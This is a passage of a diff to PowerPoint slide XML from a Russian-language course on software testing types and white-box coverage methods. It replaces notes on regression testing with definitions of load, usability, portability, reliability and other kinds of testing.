+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> или число транзакций) для определения максимально допустимого уровня нагрузки для исследуемого компонента или системы.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Тестирование производительности (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>performance testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>– процесс тестирования с целью определить производительность программного продукта. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>Стресс тестирование (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>stress testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> - вид тестирования производительности, оценивающий систему или компонент на различных граничных значениях рабочих нагрузок или за их пределами, или же в состоянии ограниченных ресурсов, таких как память или доступ к серверу.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Тестирование удобства использования (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>usability testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) - это метод тестирования, направленный на установление степени удобства использования, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>обучаемости</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>производительность, эффективность</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>efficiency</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
+              <a:t>меньше - лучше</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>правильность</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>accuracy</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) - сколько ошибок сделал пользователь во время работы с приложением? (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
+              <a:t>меньше - лучше</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>активизация в памяти</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>recall</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
+              <a:t>повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>эмоциональная реакция</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>emotional</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" err="1" smtClean="0"/>
+              <a:t>response</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
+              <a:t>положительная реакция - лучше</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3552,7 +2001,77 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Регрессионные наборы тестов запускаются множество раз и меняются медленно, поэтому регрессионное тестирование является хорошим кандидатом на автоматизацию.</a:t>
+              <a:t>Тестирование </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>сопровождаемости</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>maintainability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>).</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>Сопровождаемость</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> - </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>аспект качества в большей степени не внешний, а внутренний.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Он важен не столько конечным пользователям, не столько потребителям программы, сколько самим разработчикам и ее </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>тестировщикам</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Все его </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>подхарактеристики</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> тестированию практически не поддаются, и для них применяются какие-то другие способы контроля качества, как правило, аналитические. Статический анализ кода, код </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>ревью</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, анализ документации и так далее.</a:t>
             </a:r>
           </a:p>
           <a:p>
@@ -3561,72 +2080,280 @@
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Разновидности</a:t>
+              <a:t>Тестирование переносимости (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>portability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> testing</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>) – тестирование с целью определить переносимость ПО.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Программа должна уметь работать в различных окружениях (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>adaptibility</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>), она должна быть достаточно </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>проста в установке </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>installability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>), она должна </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>работать одновременно с другими программами</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> и не мешать им (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>coexistence</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>), и они должны не мешать ей, конечно же.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>И, наконец, хорошая программа должна предоставлять возможность пользователю перейти с какого-то другого аналогичного программного обеспечения на использование этой программы – </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>замена другого ПО данным</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>replaceability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>). То есть предоставить какие-то возможности по миграции, чаще всего по миграции данных.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Reliability </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
+              <a:t>testting</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> регрессионного тестирования:</a:t>
-            </a:r>
+              <a:t>(тестирование надежности)</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>К надежности относятся такие </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>подхарактеристики</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, как </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>зрелость </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>maturity</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>), которая является обратной величиной к частоте отказов, и </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>устойчивость к отказам</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>fault</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>tolerance</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>), то есть способность системы не реагировать на какие-то внутренние проблемы. В том числе сюда относится транзакционная целостность и способность к </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" sz="1200" kern="1200" dirty="0" smtClean="0">
+                <a:solidFill>
+                  <a:schemeClr val="tx1"/>
+                </a:solidFill>
+                <a:latin typeface="+mn-lt"/>
+                <a:ea typeface="+mn-ea"/>
+                <a:cs typeface="+mn-cs"/>
+              </a:rPr>
+              <a:t>восстановлению работоспособности при отказах</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>recoverability</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>). То есть если у вас сервер упал, то он должен самостоятельно восстановиться, вернуть все нужные данные, ничего не потерять, и продолжить работу.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>	Дымовое тестирование – поверхностная проверка того, что основные функции системы работают. </a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>	Санитарное тестирование – проверка того, что какая-либо</a:t>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>Volume testing (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>тестирование вместимости</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>)</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> – тестирование, направленное на определения объема</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t> функция системы работает как следует.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t> данных, которые может обрабатывать система </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>и\</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>	Регрессионное тестирование по дефектам, которые были исправлены в тестируемой версии ПО</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
-              <a:lnSpc>
-                <a:spcPct val="100000"/>
-              </a:lnSpc>
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buClrTx/>
-              <a:buSzTx/>
-              <a:buFontTx/>
-              <a:buNone/>
-              <a:tabLst/>
-              <a:defRPr/>
-            </a:pPr>
+              <a:t> или объем данных, которые могут находиться в базе данных и т.д.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>	Регрессионное тестирование по дефектам, которые были исправлены в предыдущих версиях ПО</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:t>Установочное тестирование – процесс тестирования на определение </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" err="1" smtClean="0"/>
+              <a:t>устанавливаемости</a:t>
+            </a:r>
             <a:r>
               <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>	Тестирование побочного эффекта – проверка того, что исправление ошибок в определенной функциональности не повлекло за собой новых ошибок в работе данной функциональности.</a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
-              <a:t>	</a:t>
-            </a:r>
-            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t> системы.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Конфигурационное тестирование – см. Тестирование переносимости.</a:t>
+            </a:r>
           </a:p>
           <a:p>
             <a:endParaRPr lang="ru-RU" dirty="0"/>
@@ -3707,59 +2434,762 @@
         <p:spPr/>
         <p:txBody>
           <a:bodyPr>
-            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
+            <a:normAutofit lnSpcReduction="10000"/>
           </a:bodyPr>
           <a:lstStyle/>
           <a:p>
             <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>После установки система программного обеспечения обычно находится в эксплуатации в течение многих лет. В это время сама система, ее конфигурация или среда исполнения часто изменяются или расширяются. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>Тестирование в период сопровождения выполняется на текущей ОС и может быть вызвано модификацией, переносом или прекращение эксплуатации данной системы. </a:t>
-            </a:r>
-          </a:p>
-          <a:p>
+              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
+              <a:t>https://ru.wikipedia.org/wiki/%D0%A1%D1%82%D1%80%D0%B0%D1%82%D0%B5%D0%B3%D0%B8%D1%8F_%D1%82%D0%B5%D1%81%D1%82%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F_%D0%BF%D0%BE_%D0%BF%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF%D1%83_%C2%AB%D0%91%D0%B5%D0%BB%D0%BE%D0%B3%D0%BE_%D1%8F%D1%89%D0%B8%D0%BA%D0%B0%C2%BB</a:t>
+            </a:r>
             <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
           </a:p>
           <a:p>
             <a:r>
               <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>В зависимости от вносимых изменений, тестирование в период сопровождения может проводиться на любом из уровней или видов тестирования. Определение, каким образом внесенные изменения могут повлиять на систему, называется анализом влияния (</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
-              <a:t>impact analysis</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
-              <a:t>) и используется при определении объема регрессионных тестов.  </a:t>
+              <a:t>Структурное тестирование (</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>тестирование</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> методом белого ящика) может выполняться на всех уровнях тестирования. Структурные методы тестирования лучше всего использовать после методов разработки тестов на основе спецификации, чтобы измерить тщательность тестирования, используя измерения покрытия структуры программы. Покрытие – это часть структуры программы, которая была охвачена тестированием, выраженная в процентах. </a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Если покрытие не равно 100%, то необходимо разрабатывать дополнительные тесты для покрытия пропущенных участков программы.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>На всех уровнях тестирования могут использоваться инструментальные средства для измерения покрытия кода.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Техника Белого ящика включает в себя следующие методы определения покрытия:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> п</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>окрытие операторов</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> покрытие решений</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> покрытие условий</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+              <a:t> комбинаторное покрытие условий</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buChar char="-"/>
+            </a:pPr>
+            <a:endParaRPr lang="ru-RU" baseline="0" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr rtl="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" b="1" dirty="0" smtClean="0"/>
+              <a:t>Покрытия операторов </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>подразумевает </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" i="1" dirty="0" smtClean="0"/>
+              <a:t>выполнение каждого оператора</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> программы по крайней мере один раз.</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr rtl="0"/>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>Рассмотрим пример:</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:pPr rtl="0"/>
+            <a:endParaRPr lang="ru-RU" dirty="0" smtClean="0"/>
+          </a:p>
+          <a:p>
+            <a:pPr>
+              <a:buFontTx/>
+              <a:buNone/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>void</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>func</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>(</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>int</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>a</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>int</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>b</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" smtClean="0"/>
+              <a:t>, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="ru-RU" dirty="0" err="1" smtClean="0"/>
+              <a:t>float</a:t>
+            </a:r>
+            <a:r>
